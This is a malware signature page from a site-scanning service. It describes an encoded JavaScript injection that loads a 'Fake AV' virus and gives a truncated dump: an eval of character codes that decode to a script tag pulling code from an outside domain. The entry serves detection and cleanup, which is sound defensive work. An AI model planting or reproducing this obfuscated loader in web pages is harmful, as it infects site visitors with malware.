SiteCheck Signatures

  1. Home
  2. Signatures
  3. SiteCheck Signatures
  4. malware-entry-mwjs229

malware-entry-mwjs229

Description: Encoded javascript malware to load the "Fake AV" virus from
multiple domains.

After decoded, it load iframes from sites like lkfjfuisdh.com:3129/js, etc.

Affecting: Any web site (no specific target).

Clean up: Malware is hidden at the index.php or index.html.

Malware dump:


eval(String.fromCharCode(102,117,110,99,116,105,111,110,32,108,106,115,40,41,123,116,114,121,123,118,97,114,32,115,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,115,99,114,105,112,116,34,41,59,115,46,115,101,116,65,116,116,114,105,98,117,116,101,40,34,115,114,99,34,44,34,104,116,116,112,58,47,47,108,107,102,106,102,117,105,115,100,104,46,99,111,109,58,51,49,50,57,47,106,115,34,41,59,100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,125...